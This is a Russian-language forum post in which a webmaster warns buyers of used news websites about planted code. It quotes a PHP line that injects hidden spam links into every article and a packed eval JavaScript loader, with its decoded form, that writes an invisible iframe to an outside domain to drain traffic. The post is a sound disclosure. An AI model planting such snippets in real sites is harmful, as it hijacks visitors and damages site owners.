Проверяйте свои сайты на наличие слива и вредносных iframe

[qmaer 4]

Всем добрый вечер!

 

Не так давно купил себе новый сайты новостной тематики. Продавец вроди порядочный человек был, все было хорошо. Но после покупки оказалось две проблемы.

 

1. В исходном коде CTRL+U было найдено левые ссылки на стороние проекты и при этом в файлах шаблона не было этих ссылок. Они размещались в системных файлах. Вот пример вредного кода:

$tpl->set( '{full-story}', $row['full_story'] . "<a style=\"display:none;\" href=\"http://newtemplates.ru/\">скачать dle 10.4</a>" . "<a style=\"display:none;\" href=\"http://newfilmak.org/\">фильмы бесплатно</a>" );

2. Следующей проблемой было слив трафа через iframe. Через счетчики ЛИ в разделе "переходы на сайты" было обнаружено след картину

 

Долго искал проблему я. И в одном шаблоном файле .js нашел вот такой код

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.b(\'<2 7="5://d.9/" f=1 4=1 8="c" g=0 6=0 a=0 e=h></2>\');',18,18,'||iframe|document|height|http|marginheight|src|style|ml|marginwidth|write|hidden|liventernet|scrolling|width|frameborder|no'.split('|'),0,{}))

После того, как было заменен eval на alert для проверки, что же закодировано там я обноружил вот такое в браузере:

document.write('<iframe src="http://liventernet.ml/" width=1 height=1 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>');

На будущее будьте внимательней при покупке сайтов и проверяйте свои старые сайты.